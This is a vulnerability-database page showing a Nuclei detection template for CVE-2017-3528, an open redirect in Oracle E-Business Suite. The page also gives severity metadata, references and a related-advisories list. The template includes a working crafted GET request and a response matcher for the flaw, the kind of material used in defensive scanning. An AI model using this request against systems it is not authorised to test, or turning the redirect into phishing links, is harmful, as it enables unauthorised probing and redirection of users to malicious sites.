Vulners
Lucene search
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect Vulnerability | 15 Jan 201800:00 | – | zdt |
 | CVE-2017-3528 | 15 Jan 201800:00 | – | circl |
 | Oracle Applications Framework Remote Vulnerability | 27 Apr 201700:00 | – | cnvd |
 | CVE-2017-3528 | 24 Apr 201719:00 | – | cve |
 | CVE-2017-3528 | 24 Apr 201719:00 | – | cvelist |
 | Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect | 15 Jan 201800:00 | – | exploitdb |
 | Oracle E-Business Suite 12.1.312.2.x - Open Redirect | 15 Jan 201800:00 | – | exploitpack |
 | CVE-2017-3528 | 24 Apr 201719:59 | – | nvd |
 | Oracle Critical Patch Update Advisory - April 2017 | 18 Apr 201700:00 | – | oracle |
 | Oracle E-Business Multiple Vulnerabilities (April 2017 CPU) | 19 Apr 201700:00 | – | nessus |
10
id: CVE-2017-3528
info:
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
author: 0x_Akoko
severity: medium
description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
impact: |
Attackers can redirect users to malicious sites for phishing attacks, malware distribution, or credential theft.
remediation: |
Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.
reference:
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
- https://nvd.nist.gov/vuln/detail/CVE-2017-3528
- http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
- http://www.securitytracker.com/id/1038299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-3528
cwe-id: CWE-601
epss-score: 0.14558
epss-percentile: 0.96203
cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: oracle
product: applications_framework
tags: cve,cve2017,oracle,redirect,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers:
- type: word
part: body
words:
- 'noresize src="/\interact.sh?configName='
# digest: 4a0a00473045022100d4f87529a818f5c8e3c326df3692d379bb7aa0228c2818d1e84ff85ef016a7d10220799bc6b962787269b2a533adf6c650ebef763562d191a25ff2cfce0be78f1b51:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 35.4
CVSS 25.8
EPSS0.14558
SSVC